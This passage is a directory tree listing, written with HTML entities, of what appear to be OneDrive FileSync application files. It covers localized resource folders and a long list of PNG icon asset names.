&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; bg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; bn-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; bs-Latn-BA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Bundle
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Assets
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; common
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; assets
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; images
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; aboutIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; accountIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; acmDismiss.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; addedFolderIcon_mac@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; addedFolderIcon_mac.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; addedFolderIcon_win@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; addedFolderIcon_win.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; add-to-onedrive.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; AISearchDark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; AISearch.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; blue_cloud48x48.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; BlueCloudCritical_Win11@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; BlueCloudCritical_Win11@3x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; BlueCloudCritical_Win11.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; blue_cloud.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; bugIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; cancel@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; cancel@3x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; cancel.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; chevronDown.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; chevronRight.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; chevronUp.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; cloud.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; coloredFolders.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; desktop.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; diamond@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; diamond@3x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; diamond.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; documents.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; downloads.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; errorDark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; error.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; exitIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; feedbackIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; file.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; folder20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; folder20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; fond_download_all.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; fond_free_up_space.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; getHelp_light.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; giveFeedback_light.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; globeIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; helpIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; help.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; house.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; ic_fluent_add_24_filled.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoDanger@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoDanger@3x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoDanger.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoDark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoOutline.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; info.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoWarningDark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; infoWarning.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; layerIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; music.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; notificationsIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; openFolder20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; openFolder20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; open-folder_original.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; open-folder.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; overflow.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; pauseIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; peopleDark.png
